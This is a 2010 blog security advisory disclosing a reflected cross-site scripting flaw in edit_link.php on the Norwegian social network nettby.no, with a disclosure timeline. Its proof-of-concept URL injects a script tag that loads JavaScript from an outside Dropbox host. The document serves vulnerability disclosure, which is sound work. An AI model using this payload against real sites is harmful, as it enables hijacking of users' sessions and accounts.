Cross-Site Scripting (XSS) at nettby.no edit_link.php

Skrevet av xqus, 10 January, 2010 - 22:32

------------------------------------------------------------------------
Cross-Site Scripting (XSS) at nettby.no edit_link.php
------------------------------------------------------------------------

Author: Audun Larsen (larsen at xqus dot com)
Date: Jan 10, 2010

--AFFECTED SOFTWARE--------------------------

Name: nettby.no
nettby.no is a norwegian social network run by
Nettby Community AS.

--DISCUSSION---------------------------------

nettby.no is vulnerable to a Non-Persistent (or reflected)
Cross-Site Scripting attack. The problem exists because of the lack
of properly escaping user input before using it to populate a texarea when
sharing a link from a remote website.

--PROOF OF CONCEPT---------------------------

http://www.nettby.no/user/edit_link.php?name=&url=&description=%3C/texta... /
%3Cscript%20src=http://dl.dropbox.com/u/432933/xss.js%3E%3C/script%3E

--TIMELINE-----------------------------------

Jan 10, 2010: Bug found
Jan 10, 2010: nettby.no notified

--DISCLAIMER---------------------------------

The information in this advisory and any of its demonstrations is provided
"as is" without warranty of any kind.

Copyright © 2010 Audun Larsen, some rights reserved:
http://creativecommons.org/licenses/by-sa/3.0/

Tags: 
xss
sikkerhet
sårbarheter
web
Kopirett © 2008-2011 Audun Larsen.
Noen rettigheter reservert.
Blogglisten
RSS
Drupal theme by Kiwi Themes.